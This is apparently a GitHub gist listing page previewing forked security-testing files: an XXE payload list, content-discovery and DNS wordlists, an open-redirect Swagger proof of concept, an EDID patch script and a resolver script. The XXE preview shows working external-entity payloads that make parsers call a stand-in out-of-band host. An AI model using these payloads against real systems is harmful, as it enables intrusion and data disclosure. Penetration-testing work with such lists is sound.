istefy
/ Swagger OpenRedirect PoC
Last active
November 30, 2023 08:17
— forked from QuduSEC/Swagger OpenRedirect PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0" | |
| info: | |
| description: "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." | |
| version: "1.0.0" | |
| title: "Swagger Petstore" | |
| termsOfService: "http://swagger.io/terms/" | |
| contact: | |
| email: "apiteam@swagger.io" | |
| license: | |
| name: "Apache 2.0" |
istefy
/ patch-edid.rb
Created
December 23, 2021 14:00
— forked from adaugherity/patch-edid.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/ruby | |
| # Create display override file to force Mac OS X to use RGB mode for Display | |
| # see http://embdev.net/topic/284710 | |
| require 'base64' | |
| data=`ioreg -l -d0 -w 0 -r -c AppleDisplay` | |
| edids=data.scan(/IODisplayEDID.*?<([a-z0-9]+)>/i).flatten | |
| vendorids=data.scan(/DisplayVendorID.*?([0-9]+)/i).flatten |
istefy
/ xxe-payloads.txt
Created
September 20, 2020 17:56
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
istefy
/ content_discovery_all.txt
Created
October 25, 2018 08:58
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
istefy
/ all.txt
Created
October 25, 2018 08:58
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
istefy
/ getValidDNS.sh
Created
September 21, 2018 23:25
— forked from Rhynorater/getValidDNS.sh
A little bash script to gather valid AND fast DNS Resolvers from public-dns.info
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [ "$#" -eq 0 ] || [ "$#" -gt 2 ] || [[ $* == *--help* ]] || [[ $* == *-h* ]]; then | |
| echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]" | |
| exit 1 | |
| fi | |